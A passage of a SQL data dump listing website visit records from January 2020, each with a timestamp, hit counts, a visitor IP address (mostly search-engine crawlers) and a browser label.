78.154.171.127','other'),(475243,1578839372,1,1,0,0,'178.154.171.134','other'),(475244,1578840431,1,1,0,0,'66.249.64.28','chrome'),(475245,1578840650,1,1,0,0,'178.153.206.113','chrome'),(475246,1578840655,1,1,0,0,'8.29.198.26','other'),(475247,1578841583,1,1,0,0,'178.154.171.134','other'),(475248,1578841823,1,1,0,0,'178.154.171.127','other'),(475249,1578843158,1,1,0,0,'188.130.136.247','chrome'),(475250,1578843432,1,1,0,0,'8.29.198.25','other'),(475251,1578843619,1,1,0,0,'141.8.142.2','other'),(475252,1578844679,1,1,0,0,'178.154.171.127','other'),(475253,1578844725,1,1,0,0,'178.154.171.134','other'),(475254,1578845590,2,2,0,0,'157.55.39.181','other'),(475255,1578845771,1,1,0,0,'178.154.171.134','other'),(475256,1578847686,1,1,0,0,'66.249.64.28','chrome'),(475257,1578847821,2,2,0,0,'178.154.171.127','other'),(475258,1578847826,1,1,0,0,'173.252.83.14','other'),(475259,1578848916,1,1,0,0,'178.154.171.127','other'),(475260,1578849048,1,1,0,0,'91.196.178.135','firefox'),(475261,1578849080,1,1,0,0,'178.154.171.134','other'),(475262,1578851512,1,1,0,0,'8.29.198.25','other'),(475263,1578851660,2,2,0,0,'178.154.171.134','other'),(475264,1578851799,2,0,2,0,'157.55.39.181',''),(475265,1578853635,1,1,0,0,'178.154.171.134','other'),(475266,1578853653,1,1,0,0,'141.8.183.73','other'),(475267,1578854050,2,2,0,0,'51.68.152.26','chrome'),(475268,1578854316,1,1,0,0,'8.29.198.27','other'),(475269,1578854784,3,3,0,0,'178.154.171.134','other'),(475270,1578855176,1,1,0,0,'66.102.9.191','chrome'),(475271,1578856689,1,1,0,0,'157.55.39.181','other'),(475272,1578856876,1,1,0,0,'178.154.171.127','other'),(475273,1578858048,1,1,0,0,'178.154.171.127','other'),(475274,1578858896,1,1,0,0,'46.18.0.104','firefox'),(475275,1578860295,1,1,0,0,'178.154.171.127','other'),(475276,1578860309,1,1,0,0,'178.154.171.134','other'),(475277,1578862357,1,1,0,0,'8.29.198.26','other'),(475278,1578862719,1,1,0,0,'209.61.195.74','other'),(475279,1578862738,1,1,0,0,'178.154.171.134','other'),(475280,1578864532,4,4,0,0,'178.154.171.127','other'),(475281,1578865222,1,1,0,0,'8.29.198.27','other'),(475282,1578865674,1,1,0,0,'178.154.171.134','other'),(475283,1578867069,1,1,0,0,'31.13.127.12','other'),(475284,1578867071,1,1,0,0,'31.13.127.24','other'),(475285,1578867431,1,1,0,0,'141.8.142.2','other'),(475286,1578868679,1,1,0,0,'157.55.39.181','other'),(475287,1578869474,1,1,0,0,'178.154.171.127','other'),(475288,1578869710,2,2,0,0,'178.154.171.134','other'),(475289,1578871875,1,1,0,0,'178.154.171.134','other'),(475290,1578871948,1,1,0,0,'141.8.142.2','other'),(475291,1578871951,1,1,0,0,'178.154.171.127','other'),(475292,1578873214,1,1,0,0,'8.29.198.26','other'),(475293,1578874286,1,1,0,0,'37.9.113.10','other'),(475294,1578874363,1,1,0,0,'178.154.171.134','other'),(475295,1578875568,1,1,0,0,'93.78.20.137','firefox'),(475296,1578876121,1,1,0,0,'8.29.198.26','other'),(475297,1578876230,1,1,0,0,'157.55.39.181','other'),(475298,1578876472,1,1,0,0,'66.249.64.26','chrome'),(475299,1578876655,1,1,0,0,'178.154.171.134','other'),(475300,1578876914,1,1,0,0,'62.205.134.182','other'),(475301,1578877507,1,1,0,0,'141.8.142.2','other'),(475302,1578877743,1,1,0,0,'157.55.39.181','other'),(475303,1578877807,1,1,0,0,'178.154.171.134','other'),(475304,1578877984,2,2,0,0,'178.154.171.127','other'),(475305,1578878722,1,1,0,0,'178.154.171.134','other'),(475306,1578878988,1,1,0,0,'5.55.27.14','chrome'),(475307,1578879384,1,1,0,0,'178.154.171.127','other'),(475308,1578880113,1,1,0,0,'178.154.171.134','other'),(475309,1578881775,1,1,0,0,'46.42.149.141','msie'),(475310,1578881784,1,1,0,0,'94.180.143.148','msie'),(475311,1578883485,1,1,0,0,'178.154.171.134','other'),(475312,1578883492,1,1,0,0,'141.8.142.2','other'),(475313,1578884076,1,1,0,0,'54.71.174.67','chrome'),(475314,1578884079,1,1,0,0,'52.34.24.33','other'),(475315,1578884128,1,1,0,0,'8.29.198.27','other'),(475316,1578884130,1,1,0,0,'178.154.171.127','other'),(475317,1578885386,2,2,0,0,'178.154.171.134','other'),(475318,1578887034,1,1,0,0,'8.29.198.25','other'),(475319,1578887348,2,2,0,0,'178.154.171.134','other'),(475320,1578889414,1,1,0,0,'178.154.171.127','other'),(475321,1578890414,1,1,0,0,'178.154.171.134','other'),(475322,1578891132,1,1,0,0,'157.55.39.45','other'),(475323,1578891313,1,1,0,0,'141.8.183.73','other'),(475324,1578894113,1,1,0,0,'62.205.134.182','other'),(475325,1578894543,1,1,0,0,'178.154.171.134','other'),(475326,1578895015,1,1,0,0,'8.29.198.25','other'),(475327,1578895018,2,2,0,0,'178.154.171.127','other'),(475328,1578895340,2,2,0,0,'157.55.39.45','other'),(475329,1578895594,1,1,0,0,'178.154.171.134','other'),(475330,1578895936,1,1,0,0,'209.17.96.202','other'),(475331,1578896188,1,1,0,0,'207.46.13.211','other'),(475332,1578896746,1,1,0,0,'141.8.183.111','other'),(475333,1578896850,1,1,0,0,'178.154.171.134','other'),(475334,1578897167,2,2,0,0,'157.55.39.45','other'),(475335,1578897956,1,1,0,0,'8.29.198.26','other'),(475336,1578898688,2,2,0,0,'206.189.95.104','other'),(475337,1578898804,1,1,0,0,'66.249.64.28','chrome'),(475338,1578899467,1,1,0,0,'91.196.178.82','chrome'),(475339,1578899719,1,1,0,0,'31.13.115.5','other'),(475340,1578899720,1,1,0,0,'31.13.115.17','other'),(475343,1578899874,1,1,0,0,'91.196.178.92','chrome'),(475344,1578900356,1,1,0,0,'207.46.13.211','other'),(475345,1578901112,1,1,0,0,'213.87.149.179','firefox'),(475346,1578901131,1,1,0,0,'178.154.171.134','other'),(475347,1578903502,1,1,0,0,'88.154.107.174','chrome'),(475348,1578904191,1,1,0,0,'157.55.39.45','other'),(475349,1578905724,1,1,0,0,'178.154.171.134','other'),(475350,1578905793,1,1,0,0,'95.132.36.111','chrome'),(475351,1578905894,1,1,0,0,'8.29.198.26','other'),(475352,1578906387,1,1,0,0,'91.196.178.164','chrome'),(475353,1578907286,1,1,0,0,'18.218.74.242','chrome'),(475354,1578908425,1,1,0,0,'178.154.171.134','other'),(475355,1578908830,1,1,0,0,'8.29.198.27','other'),(475356,1578909734,1,1,0,0,'207.46.13.211','other'),(475357,1578910379,2,2,0,0,'207.46.13.129','other'),(475358,1578910463,1,1,0,0,'91.196.178.171','chrome'),(475359,1578910596,1,1,0,0,'178.154.171.127','other'),(475360,1578911241,1,1,0,0,'66.249.64.26','chrome'),(475361,1578911411,1,1,0,0,'95.67.72.70','chrome'),(475362,1578911631,1,1,0,0,'178.154.171.134','other'),(475363,1578912780,1,1,0,0,'37.53.90.175','chrome'),(475364,1578913892,1,1,0,0,'178.154.171.127','other'),(475365,1578913915,1,1,0,0,'178.154.171.134','other'),(475366,1578914951,1,1,0,0,'109.74.154.72','chrome'),(475367,1578915082,1,1,0,0,'207.46.13.129','other'),(475368,1578916064,2,2,0,0,'178.154.171.134','other'),(475369,1578916807,1,1,0,0,'8.29.198.25','other'),(475370,1578917331,2,2,0,0,'207.46.13.211','other'),(475371,1578917402,1,1,0,0,'141.8.142.2','other'),(475372,1578917528,1,1,0,0,'91.196.177.208','chrome'),(475373,1578917687,1,1,0,0,'157.55.39.45','other'),(475374,1578918137,1,1,0,0,'207.46.13.129','other'),(475375,1578918243,1,1,0,0,'178.154.171.127','other'),(475376,1578918453,1,1,0,0,'207.46.13.211','other'),(475377,1578918904,1,1,0,0,'212.129.3.60','chrome'),(475378,1578918976,1,1,0,0,'157.55.39.45','other'),(475379,1578919806,1,1,0,0,'8.29.198.25','other'),(475380,1578920328,1,1,0,0,'178.154.171.134','other'),(475381,1578920860,1,1,0,0,'87.250.224.90','other'),(475382,1578920936,1,1,0,0,'195.34.204.116','chrome'),(475383,1578921485,2,2,0,0,'157.55.39.45','other'),(475384,1578922840,1,1,0,0,'178.154.171.134','other'),(475385,1578923626,1,1,0,0,'207.46.13.129','other'),(475386,1578923806,1,1,0,0,'91.196.178.79','chrome'),(475387,1578923842,1,1,0,0,'148.251.10.183','other'),(475388,1578923965,1,1,0,0,'178.154.171.134','other'),(475389,1578924013,1,1,0,0,'91.196.178.175','chrome'),(475390,1578924660,1,1,0,0,'91.196.178.91','chrome'),(475391,1578924686,1,1,0,0,'207.46.13.211','other'),(475392,1578926106,1,1,0,0,'91.196.178.175','chrome'),(475393,1578926610,1,0,1,0,'207.46.13.211',''),(475394,1578927235,1,1,0,0,'207.46.13.211','other'),(475395,1578927389,2,2,0,0,'178.154.171.134','other'),(475396,1578927709,1,1,0,0,'8.29.198.27','other'),(475397,1578927712,1,1,0,0,'91.225.111.253','chrome'),(475398,1578929365,1,1,0,0,'207.46.13.129','other'),(475399,1578930733,1,1,0,0,'8.29.198.25','other'),(475400,1578932067,1,1,0,0,'66.102.9.161','chrome'),(475401,1578932117,2,2,0,0,'207.46.13.191','other'),(475402,1578933142,1,1,0,0,'88.99.2.203','other'),(475403,1578933892,1,1,0,0,'66.249.93.216','chrome'),(475404,1578933935,2,2,0,0,'178.154.171.134','other'),(475405,1578934509,1,1,0,0,'88.99.2.203','other'),(475406,1578934664,2,2,0,0,'31.13.127.4','other'),(475407,1578934665,2,2,0,0,'31.13.127.8','other'),(475412,1578934666,1,1,0,0,'31.13.127.15','other'),(475416,1578934707,1,1,0,0,'91.196.178.25','chrome'),(475417,1578934914,1,1,0,0,'157.55.39.45','other'),(475418,1578935142,1,1,0,0,'207.46.13.211','other'),(475419,1578935333,1,1,0,0,'178.154.171.134','other'),(475420,1578935507,1,1,0,0,'88.99.2.203','other'),(475421,1578936427,1,1,0,0,'88.99.2.203','other'),(475422,1578936513,1,1,0,0,'207.46.13.191','other'),(475423,1578937399,1,1,0,0,'88.99.2.203','other'),(475424,1578938219,1,1,0,0,'178.154.171.134','other'),(475425,1578938359,1,1,0,0,'207.46.13.191','other'),(475426,1578938424,1,1,0,0,'88.99.2.203','other'),(475427,1578938574,1,1,0,0,'207.46.13.211','other'),(475428,1578938679,1,1,0,0,'8.29.198.27','other'),(475429,1578938729,1,1,0,0,'157.55.39.45','other'),(475430,1578938894,2,2,0,0,'178.154.171.127','other'),(475431,1578939144,2,2,0,0,'95.133.150.143','chrome'),(475432,1578940483,2,2,0,0,'178.154.171.127','other'),(475433,1578940618,1,1,0,0,'178.154.171.134','other'),(475434,1578941655,1,1,0,0,'8.29.198.27','other'),(475435,1578941665,1,1,0,0,'178.154.171.127','other'),(475436,1578941674,1,1,0,0,'157.55.39.45','other'),(475437,1578941726,1,1,0,0,'178.154.171.134','other'),(475438,1578942729,1,1,0,0,'178.154.171.134','other'),(475439,1578942755,1,1,0,0,'178.154.171.127','other'),(475440,1578942895,1,1,0,0,'91.196.178.94','chrome'),(475441,1578943123,1,1,0,0,'157.55.39.45','other'),(475442,1578943461,2,2,0,0,'207.46.13.211','other'),(475443,1578943968,2,2,0,0,'178.154.171.127','other'),(475444,1578943979,1,1,0,0,'178.154.171.134','other'),(475445,1578944061,1,1,0,0,'157.55.39.45','other'),(475446,1578944450,1,1,0,0,'207.46.13.211','other'),(475447,1578944522,1,1,0,0,'91.196.178.178','chrome'),(475448,1578945536,1,1,0,0,'178.154.171.134','other'),(475449,1578945777,1,1,0,0,'157.55.39.45','other'),(475450,1578946495,1,1,0,0,'193.194.127.179','chrome'),(475451,1578946557,1,1,0,0,'178.154.171.134','other'),(475452,1578947095,2,2,0,0,'95.213.141.126','opera'),(475453,1578947589,3,3,0,0,'178.154.171.134','other'),(475454,1578948011,1,1,0,0,'93.175.222.175','chrome'),(475455,1578948058,2,2,0,0,'207.46.13.191','other'),(475456,1578948784,3,3,0,0,'178.154.171.134','other'),(475457,1578949104,2,0,2,0,'157.55.39.45',''),(475458,1578949565,1,1,0,0,'8.29.198.26','other'),(475459,1578949833,1,1,0,0,'178.154.171.134','other'),(475460,1578951234,1,1,0,0,'93.73.223.185','other'),(475461,1578951472,2,2,0,0,'66.249.64.28','chrome'),(475462,1578951857,1,1,0,0,'207.46.13.191','other'),(475463,1578951982,2,2,0,0,'178.154.171.134','other'),(475464,1578952568,1,1,0,0,'8.29.198.27','other'),(475465,1578953286,1,1,0,0,'66.249.64.26','chrome'),(475466,1578954524,1,1,0,0,'157.55.39.45','other'),(475467,1578954949,2,0,2,0,'207.46.13.109',''),(475468,1578955048,1,1,0,0,'207.46.13.211','other'),(475469,1578955095,1,1,0,0,'178.154.171.134','other'),(475470,1578955454,1,1,0,0,'207.46.13.179','other'),(475471,1578956330,1,1,0,0,'178.154.171.134','other'),(475472,1578956947,1,1,0,0,'209.17.96.114','other'),(475473,1578957447,2,2,0,0,'178.154.171.134','other'),(475474,1578957482,1,1,0,0,'141.8.142.2','other'),(475475,1578958968,1,1,0,0,'178.154.171.134','other'),(475476,1578960027,1,1,0,0,'178.154.171.127','other'),(475477,1578960459,1,1,0,0,'8.29.198.27','other'),(475478,1578960741,1,1,0,0,'207.46.13.191','other'),(475479,1578960907,1,1,0,0,'157.55.39.139','other'),(475480,1578961421,2,2,0,0,'207.46.13.109','other'),(475481,1578961956,1,1,0,0,'157.55.39.45','other'),(475482,1578962143,1,1,0,0,'178.154.171.134','other'),(475483,1578962513,1,1,0,0,'66.249.64.27','chrome'),(475484,1578962606,1,1,0,0,'178.154.171.127','other'),(475485,1578963214,1,1,0,0,'178.154.171.134','other'),(475486,1578963265,2,2,0,0,'207.46.13.179','other'),(475487,1578963313,1,1,0,0,'62.205.134.182','other'),(475488,1578963491,1,1,0,0,'8.29.198.26','other'),(475489,1578963783,2,0,2,0,'157.55.39.139',''),(475490,1578965605,1,1,0,0,'207.46.13.109','other'),(475491,1578966007,1,1,0,0,'178.154.171.134','other'),(475492,1578966157,1,1,0,0,'157.55.39.139','other'),(475493,1578966494,1,1,0,0,'207.46.13.179','other'),(475494,1578967131,2,2,0,0,'178.154.171.134','other'),(475495,1578967494,2,2,0,0,'207.46.13.179','other'),(475496,1578967604,2,2,0,0,'207.46.13.109','other'),(475497,1578968101,3,3,0,0,'178.154.171.134','other'),(475498,1578968340,1,1,0,0,'178.154.171.127','other'),(475499,1578968543,1,1,0,0,'207.46.13.75','other'),(475500,1578969035,1,1,0,0,'178.154.171.134','other'),(475501,1578969685,1,1,0,0,'207.46.13.75','other'),(475502,1578970025,1,1,0,0,'178.154.171.134','other'),(475503,1578970191,1,1,0,0,'141.8.142.2','other'),(475504,1578971285,1,1,0,0,'35.166.96.105','chrome'),(475505,1578971289,1,1,0,0,'52.41.211.72','other'),(475506,1578971337,1,1,0,0,'8.29.198.25','other'),(475507,1578972982,1,1,0,0,'178.154.171.127','other'),(475508,1578973043,1,1,0,0,'141.8.183.73','other'),(475509,1578973632,1,1,0,0,'141.8.142.2','other'),(475510,1578973825,2,2,0,0,'178.154.171.134','other'),(475511,1578974387,1,1,0,0,'8.29.198.27','other'),(475512,1578975458,3,3,0,0,'178.154.171.134','other'),(475513,1578976293,1,1,0,0,'66.249.64.26','chrome'),(475514,1578976919,1,0,1,0,'157.55.39.139',''),(475515,1578977194,1,1,0,0,'157.55.39.104','other'),(475516,1578977272,1,1,0,0,'178.154.171.134','other'),(475517,1578977468,2,1,1,0,'157.55.39.139',''),(475518,1578978022,2,2,0,0,'207.46.13.109','other'),(475519,1578978397,1,1,0,0,'157.55.39.139','other'),(475520,1578978622,1,1,0,0,'199.244.88.124','chrome'),(475521,1578979596,1,1,0,0,'178.128.31.218','firefox'),(475522,1578980674,1,1,0,0,'62.205.134.182','other'),(475523,1578980850,1,0,1,0,'66.249.70.36',''),(475524,1578982232,1,1,0,0,'8.29.198.27','other'),(475525,1578983067,2,2,0,0,'157.55.39.140','other'),(475526,1578985308,1,1,0,0,'8.29.198.25','other'),(475527,1578985971,1,1,0,0,'178.154.171.134','other'),(475528,1578986215,1,1,0,0,'157.55.39.140','other'),(475529,1578986593,1,1,0,0,'157.55.39.55','other'),(475530,1578986818,1,1,0,0,'91.196.178.71','chrome'),(475531,1578987446,1,1,0,0,'91.196.178.164','chrome'),(475532,1578987472,1,1,0,0,'82.207.91.234','other'),(475533,1578987578,1,1,0,0,'157.55.39.140','other'),(475534,1578988854,1,1,0,0,'157.55.39.55','other'),(475535,1578989412,3,3,0,0,'178.154.171.134','other'),(475536,1578989938,1,1,0,0,'78.106.169.40','other'),(475537,1578989956,1,1,0,0,'157.55.39.140','other'),(475538,1578990182,2,2,0,0,'66.249.64.26','chrome'),(475539,1578990466,1,1,0,0,'62.80.185.138','chrome'),(475540,1578991091,1,1,0,0,'178.154.171.134','other'),(475541,1578991465,2,2,0,0,'178.154.171.127','other'),(475542,1578991568,1,1,0,0,'62.80.185.138','chrome'),(475543,1578991690,1,1,0,0,'141.8.142.2','other'),(475544,1578992064,2,2,0,0,'178.154.171.134','other'),(475545,1578992981,1,1,0,0,'91.196.177.46','chrome'),(475546,1578993138,1,1,0,0,'8.29.198.25','other'),(475547,1578993141,1,1,0,0,'178.154.171.127','other'),(475548,1578994129,1,1,0,0,'3.19.56.157','chrome'),(475549,1578994309,1,1,0,0,'178.154.171.134','other'),(475550,1578994410,1,1,0,0,'178.154.171.127','other'),(475551,1578995616,1,1,0,0,'66.249.64.28','chrome'),(475552,1578995750,1,1,0,0,'178.154.171.134','other'),(475553,1578995892,2,2,0,0,'91.196.178.164','chrome'),(475554,1578995911,2,2,0,0,'37.53.123.182','firefox'),(475555,1578996230,1,1,0,0,'8.29.198.26','other'),(475556,1578996416,1,1,0,0,'141.8.142.119','other'),(475557,1578996738,1,1,0,0,'141.8.183.100','other'),(475558,1578996929,1,1,0,0,'95.134.221.157','chrome'),(475559,1578996980,1,1,0,0,'157.55.39.55','other'),(475560,1578998446,1,1,0,0,'141.8.183.59','other'),(475561,1578998601,1,1,0,0,'93.183.210.254','chrome'),(475562,1578999086,2,2,0,0,'178.154.171.127','other'),(475563,1578999092,1,1,0,0,'178.154.171.134','other'),(475564,1578999129,1,1,0,0,'157.55.39.104','other'),(475565,1579000318,1,1,0,0,'178.154.171.134','other'),(475566,1579000555,1,1,0,0,'178.154.171.127','other'),(475567,1579001036,1,0,1,0,'157.55.39.55',''),(475568,1579001467,1,1,0,0,'157.55.39.55','other'),(475569,1579001917,1,1,0,0,'109.74.154.72','chrome'),(475570,1579002008,1,1,0,0,'178.154.171.134','other'),(475571,1579002739,1,1,0,0,'31.13.115.14','other'),(475572,1579002740,1,1,0,0,'31.13.115.10','other'),(475573,1579003094,1,0,1,0,'157.55.39.140',''),(475574,1579004038,1,1,0,0,'8.29.198.25','other'),(475575,1579004743,1,1,0,0,'178.154.171.134','other'),(475576,1579004814,1,1,0,0,'157.55.39.140','other'),(475577,1579007145,1,1,0,0,'157.55.39.55','other'),(475578,1579007150,1,1,0,0,'8.29.198.27','other'),(475579,1579007306,1,1,0,0,'178.154.171.134','other'),(475580,1579008456,1,1,0,0,'207.46.13.166','other'),(475581,1579009936,1,0,1,0,'66.249.64.28',''),(475582,1579010244,1,1,0,0,'199.244.88.124','chrome'),(475583,1579010318,3,3,0,0,'157.55.39.55','other'),(475584,1579010636,2,2,0,0,'91.196.177.46','chrome'),(475585,1579011029,1,1,0,0,'207.46.13.72','other'),(475586,1579011092,1,1,0,0,'178.154.171.134','other'),(475587,1579011154,2,2,0,0,'66.249.64.26','chrome'),(475588,1579011299,1,1,0,0,'178.154.171.127','other'),(475589,1579011818,1,1,0,0,'207.46.13.166','other'),(475590,1579012183,1,1,0,0,'207.46.13.72','other'),(475591,1579013758,2,0,2,0,'157.55.39.55',''),(475592,1579014164,1,1,0,0,'91.196.177.46','chrome'),(475593,1579014267,1,1,0,0,'207.46.13.166','other'),(475594,1579014787,3,3,0,0,'157.55.39.55','other'),(475595,1579014856,2,2,0,0,'91.196.178.164','chrome'),(475596,1579014951,1,1,0,0,'8.29.198.27','other'),(475597,1579015210,1,1,0,0,'178.154.171.134','other'),(475598,1579015464,1,1,0,0,'66.249.64.28','chrome'),(475599,1579015489,1,1,0,0,'209.17.96.186','other'),(475600,1579016063,1,1,0,0,'91.196.178.164','chrome'),(475601,1579016256,1,1,0,0,'66.249.64.27','chrome'),(475602,1579016263,1,1,0,0,'66.249.64.26','chrome'),(475603,1579016286,1,1,0,0,'207.46.13.166','other'),(475604,1579017794,1,1,0,0,'66.249.64.28','chrome'),(475605,1579017861,1,1,0,0,'91.196.178.80','chrome'),(475606,1579018230,1,1,0,0,'8.29.198.25','other'),(475607,1579018483,1,1,0,0,'207.46.13.166','other'),(475608,1579019130,1,1,0,0,'91.196.177.46','chrome'),(475609,1579019532,1,1,0,0,'178.154.171.134','other'),(475610,1579019545,1,1,0,0,'66.249.64.26','chrome'),(475611,1579019565,1,1,0,0,'66.249.64.27','chrome'),(475612,1579019678,1,1,0,0,'91.196.178.173','chrome'),(475613,1579020037,1,1,0,0,'37.54.20.66','chrome'),(475614,1579020067,1,1,0,0,'91.196.178.76','chrome'),(475615,1579020652,1,1,0,0,'178.154.171.127','other'),(475616,1579020753,2,2,0,0,'157.55.39.55','other'),(475617,1579023333,2,2,0,0,'207.46.13.72','other'),(475618,1579023750,1,1,0,0,'207.46.13.166','other'),(475619,1579024679,3,3,0,0,'31.13.127.12','other'),(475620,1579024681,1,1,0,0,'31.13.127.16','other'),(475621,1579024904,2,2,0,0,'207.46.13.166','other'),(475622,1579025856,1,1,0,0,'37.110.145.11','chrome'),(475623,1579025870,1,1,0,0,'8.29.198.25','other'),(475624,1579026547,2,2,0,0,'157.55.39.55','other'),(475625,1579026593,1,1,0,0,'178.154.171.134','other'),(475626,1579026892,1,1,0,0,'3.231.230.4','other'),(475627,1579027238,1,1,0,0,'91.196.178.173','chrome'),(475628,1579029200,1,1,0,0,'8.29.198.25','other'),(475629,1579030662,1,1,0,0,'207.46.13.72','other'),(475630,1579031395,2,0,2,0,'207.46.13.85',''),(475631,1579034072,1,1,0,0,'66.249.70.33','chrome'),(475632,1579034549,1,0,1,0,'66.249.64.28',''),(475633,1579035749,1,1,0,0,'66.249.70.33','chrome'),(475634,1579035877,1,1,0,0,'66.249.70.36','chrome'),(475635,1579035909,1,1,0,0,'46.211.221.89','chrome'),(475636,1579036025,1,1,0,0,'178.154.171.134','other'),(475637,1579036310,2,2,0,0,'207.46.13.85','other'),(475638,1579036805,1,1,0,0,'8.29.198.25','other'),(475639,1579038312,1,1,0,0,'157.55.39.55','other'),(475640,1579038613,1,1,0,0,'66.249.64.26','chrome'),(475641,1579038798,1,1,0,0,'178.154.171.134','other'),(475642,1579039319,2,1,1,0,'207.46.13.85',''),(475643,1579040110,1,1,0,0,'8.29.198.27','other'),(475644,1579040569,1,0,1,0,'207.46.13.85',''),(475645,1579041528,1,1,0,0,'93.75.40.235','firefox'),(475646,1579041924,1,1,0,0,'157.55.39.55','other'),(475647,1579042061,1,1,0,0,'207.46.13.72','other'),(475648,1579042117,1,1,0,0,'207.46.13.85','other'),(475649,1579042179,1,1,0,0,'207.46.13.166','other'),(475650,1579042740,1,1,0,0,'178.154.171.134','other'),(475651,1579042994,1,1,0,0,'157.55.39.55','other'),(475652,1579043938,1,1,0,0,'207.46.13.72','other'),(475653,1579044515,1,1,0,0,'66.249.70.33','chrome'),(475654,1579044811,1,0,1,0,'157.55.39.93',''),(475655,1579045386,1,1,0,0,'66.249.64.28','chrome'),(475656,1579045434,1,1,0,0,'157.55.39.55','other'),(475657,1579045902,1,1,0,0,'66.249.70.36','chrome'),(475658,1579046154,1,0,1,0,'157.55.39.93',''),(475659,1579046193,1,1,0,0,'178.154.171.134','other'),(475660,1579046217,1,1,0,0,'31.13.115.1','other'),(475661,1579046218,1,1,0,0,'31.13.115.2','other'),(475663,1579046582,1,1,0,0,'157.55.39.93','other'),(475664,1579047131,1,1,0,0,'27.64.73.0','chrome'),(475665,1579047280,2,2,0,0,'178.154.171.134','other'),(475666,1579047705,1,1,0,0,'8.29.198.27','other'),(475667,1579048421,1,1,0,0,'157.55.39.55','other'),(475668,1579048684,1,1,0,0,'157.55.39.93','other'),(475669,1579048711,1,1,0,0,'178.154.171.134','other'),(475670,1579049414,1,1,0,0,'66.249.64.28','chrome'),(475671,1579049714,1,1,0,0,'62.205.134.182','other'),(475672,1579050234,1,1,0,0,'178.154.171.134','other'),(475673,1579050297,1,1,0,0,'66.249.64.27','chrome'),(475674,1579051033,1,1,0,0,'8.29.198.27','other'),(475675,1579051117,1,1,0,0,'185.244.219.121','chrome'),(475676,1579051440,1,1,0,0,'157.55.39.93','other'),(475677,1579052802,1,1,0,0,'157.55.39.93','other'),(475678,1579053337,1,1,0,0,'157.55.39.55','other'),(475679,1579056637,1,1,0,0,'178.154.171.134','other'),(475680,1579057452,1,1,0,0,'66.249.70.62','chrome'),(475681,1579057575,1,1,0,0,'66.249.70.36','chrome'),(475682,1579058725,1,1,0,0,'66.249.64.28','chrome'),(475683,1579058884,1,1,0,0,'8.29.198.26','other'),(475684,1579060330,1,1,0,0,'178.154.171.134','other'),(475685,1579060745,1,0,1,0,'66.249.64.27',''),(475686,1579061026,1,1,0,0,'157.55.39.93','other'),(475687,1579061693,1,0,1,0,'207.46.13.80',''),(475688,1579061932,1,1,0,0,'178.154.171.127','other'),(475689,1579061941,1,1,0,0,'8.29.198.26','other'),(475690,1579062915,1,1,0,0,'207.46.13.80','other'),(475691,1579062944,1,1,0,0,'157.55.39.93','other'),(475692,1579064767,1,1,0,0,'178.22.68.186','chrome'),(475693,1579065095,1,1,0,0,'178.154.171.134','other'),(475694,1579065114,3,3,0,0,'207.46.13.80','other'),(475695,1579066457,1,1,0,0,'207.46.13.223','other'),(475696,1579066984,1,1,0,0,'62.205.134.182','other'),(475697,1579068699,2,2,0,0,'207.46.13.80','other'),(475698,1579068926,2,2,0,0,'157.55.39.93','other'),(475699,1579069334,1,1,0,0,'178.154.171.127','other'),(475700,1579069431,1,1,0,0,'78.111.185.241','chrome'),(475701,1579069481,1,1,0,0,'185.244.219.121','chrome'),(475702,1579069824,1,1,0,0,'8.29.198.25','other'),(475703,1579069858,1,1,0,0,'178.154.171.134','other'),(475704,1579071193,1,1,0,0,'178.154.171.134','other'),(475705,1579071931,1,1,0,0,'207.46.13.10','other'),(475706,1579072570,1,1,0,0,'95.134.189.4','chrome'),(475707,1579072839,1,1,0,0,'8.29.198.26','other'),(475708,1579072977,1,1,0,0,'178.154.171.134','other'),(475709,1579073082,1,1,0,0,'80.255.64.192','chrome'),(475710,1579073086,1,1,0,0,'207.46.13.55','other'),(475711,1579073323,1,1,0,0,'207.46.13.10','other'),(475712,1579073655,1,1,0,0,'95.134.189.4','chrome'),(475713,1579073937,1,1,0,0,'178.154.171.134','other'),(475714,1579074731,1,1,0,0,'91.196.178.164','chrome'),(475715,1579075120,1,1,0,0,'66.249.70.62','chrome'),(475716,1579076038,1,0,1,0,'66.249.70.33',''),(475717,1579076067,1,1,0,0,'141.8.142.2','other'),(475718,1579076241,1,1,0,0,'91.196.178.78','chrome'),(475719,1579077337,1,1,0,0,'141.8.183.73','other'),(475720,1579077371,1,1,0,0,'207.46.13.10','other'),(475721,1579078892,1,1,0,0,'77.111.244.195','chrome'),(475722,1579079062,1,1,0,0,'178.154.171.134','other'),(475723,1579080275,1,1,0,0,'207.46.13.234','other'),(475724,1579080709,1,1,0,0,'8.29.198.27','other'),(475725,1579081106,2,2,0,0,'207.46.13.10','other'),(475726,1579081208,1,1,0,0,'66.249.64.28','chrome'),(475727,1579081870,1,1,0,0,'46.200.231.122','chrome'),(475728,1579082024,1,1,0,0,'18.208.196.151','chrome'),(475729,1579082292,2,2,0,0,'207.46.13.10','other'),(475730,1579082585,1,1,0,0,'178.154.171.134','other'),(475731,1579082974,1,1,0,0,'141.8.183.73','other'),(475732,1579083216,1,1,0,0,'91.196.178.78','chrome'),(475733,1579083284,2,2,0,0,'157.55.39.70','other'),(475734,1579083767,1,1,0,0,'8.29.198.26','other'),(475735,1579084321,1,1,0,0,'91.196.177.42','chrome'),(475736,1579085023,1,1,0,0,'91.196.178.1','chrome'),(475737,1579085215,1,1,0,0,'178.154.171.134','other'),(475738,1579085670,2,2,0,0,'95.213.141.126','opera'),(475739,1579085884,1,1,0,0,'66.249.70.36','chrome'),(475740,1579086220,2,2,0,0,'207.46.13.10','other'),(475741,1579086382,1,1,0,0,'157.55.39.70','other'),(475742,1579086599,1,1,0,0,'31.13.127.10','other'),(475743,1579086600,2,2,0,0,'31.13.127.14','other'),(475744,1579086601,1,1,0,0,'31.13.127.23','other'),(475745,1579088360,1,1,0,0,'109.74.154.72','chrome'),(475746,1579088482,1,1,0,0,'178.154.171.134','other'),(475747,1579089948,1,1,0,0,'157.55.39.70','other'),(475748,1579090751,1,1,0,0,'91.196.178.89','firefox'),(475749,1579091128,1,1,0,0,'46.211.211.244','chrome'),(475750,1579091612,1,1,0,0,'8.29.198.26','other'),(475751,1579091707,1,1,0,0,'91.196.178.184','chrome'),(475752,1579093186,1,1,0,0,'66.249.64.28','chrome'),(475753,1579094273,1,1,0,0,'178.154.171.134','other'),(475754,1579094416,1,1,0,0,'207.46.13.10','other'),(475755,1579094465,1,1,0,0,'91.124.119.47','chrome'),(475756,1579094906,1,1,0,0,'8.29.198.27','other'),(475757,1579095014,1,1,0,0,'207.46.13.180','other'),(475758,1579095661,1,1,0,0,'91.196.178.189','chrome'),(475759,1579096673,1,1,0,0,'91.196.179.25','firefox'),(475760,1579096933,1,1,0,0,'178.154.171.134','other'),(475761,1579097972,1,1,0,0,'178.154.171.134','other'),(4757